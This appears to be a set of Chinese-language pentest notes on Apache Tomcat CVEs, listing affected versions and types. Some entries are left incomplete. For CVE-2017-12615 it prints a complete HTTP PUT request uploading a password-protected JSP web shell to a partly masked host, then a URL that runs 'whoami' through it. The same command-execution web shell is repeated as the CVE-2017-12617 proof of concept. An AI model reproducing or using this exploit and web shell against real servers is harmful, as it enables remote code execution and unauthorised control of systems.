应用安全

cve-2020-1938

Date
2020.1(长亭科技提交)

类型
RCE

影响范围（低版本未测试）
Apache Tomcat 9.x < 9.0.31
Apache Tomcat 8.x < 8.5.51
Apache Tomcat 7.x < 7.0.100
Apache Tomcat 6.x

管理后台弱口令

CVE-2019-0232

Date
2019

类型
任意代码执行

影响版本
Apache Tomcat 9.0.0.M1 to 9.0.17
Apache Tomcat 8.5.0 to 8.5.39
Apache Tomcat 7.0.0 to 7.0.93

前置条件
操作系统：Windows

CVE-2019-0211

Date
2019

类型
提权

影响版本

CVE-2017-12615

Date
2017

影响范围
 Apache Tomcat 7.0.0 - 7.0.81

前置条件
（1）web.xml


（2）
http协议支持Put请求
（3）

操作系统：Windows

复现

(1)发包

PUT /dark.jsp HTTP/1.1
Host: xx.xx.163.193:8083
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:71.0) Gecko/20100101 Firefox/71.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
DNT: 1
Connection: keep-alive
Upgrade-Insecure-Requests: 1
Pragma: no-cache
Cache-Control: no-cache
Content-Length: 1039

<%@ page language="java" import="java.util.*,java.io.*" pageEncoding="UTF-8"%><%!public static String excuteCmd(String c) {StringBuilder line = new StringBuilder();try {Process pro = Runtime.getRuntime().exec(c);BufferedReader buf = new BufferedReader(new InputStreamReader(pro.getInputStream()));String temp = null;while ((temp = buf.readLine()) != null) {line.append(temp +"\n");}buf.close();} catch (Exception e) {line.append(e.getMessage());}return line.toString();}%><%if("023".equals(request.getParameter("pwd"))&&!"".equals(request.getParameter("cmd"))){out.println("<pre>"+excuteCmd(request.getParameter("cmd"))+"</pre>");}else{out.println(":-)");}%>

(2)命令执行
xx.xx.163.193:8083/dark.jsp?&pwd=023&cmd=whoami

CVE-2017-12616

Date
2017

类型
信息泄露

影响范围
Apache Tomcat 7.0.0 - 7.0.80 

前置条件
server.xml-VirtualDirContext-默认无-手工添加

CVE-2017-12617

Date
2017

类型
远程代码执行


影响范围
Apache Tomcat 7.0.0 – 7.0.81

poc：
<%@ page language="java" import="java.util.*,java.io.*" pageEncoding="UTF-8"%>
<%!public static String excuteCmd(String c) 
{
    StringBuilder line = new StringBuilder();
try 
{
    Process pro = Runtime.getRuntime().exec(c);
    BufferedReader buf = new BufferedReader(new InputStreamReader(pro.getInputStream()));
    String temp = null;
    while ((temp = buf.readLine()) != null) 
    {
        line.append(temp+"\n");
    }
    buf.close();
} 
catch (Exception e) 
{
    line.append(e.getMessage());
}
return line.toString();
}
%>
<%
if("023".equals(request.getParameter("pwd"))&&!"".equals(request.getParameter("cmd")))
{
    out.println("<pre>"+excuteCmd(request.getParameter("cmd"))+"</pre>");
}
else
{
    out.println(":-)");
}
%>

Apache Tomcat 块请求远程拒绝服务漏洞(CVE-2014-0075)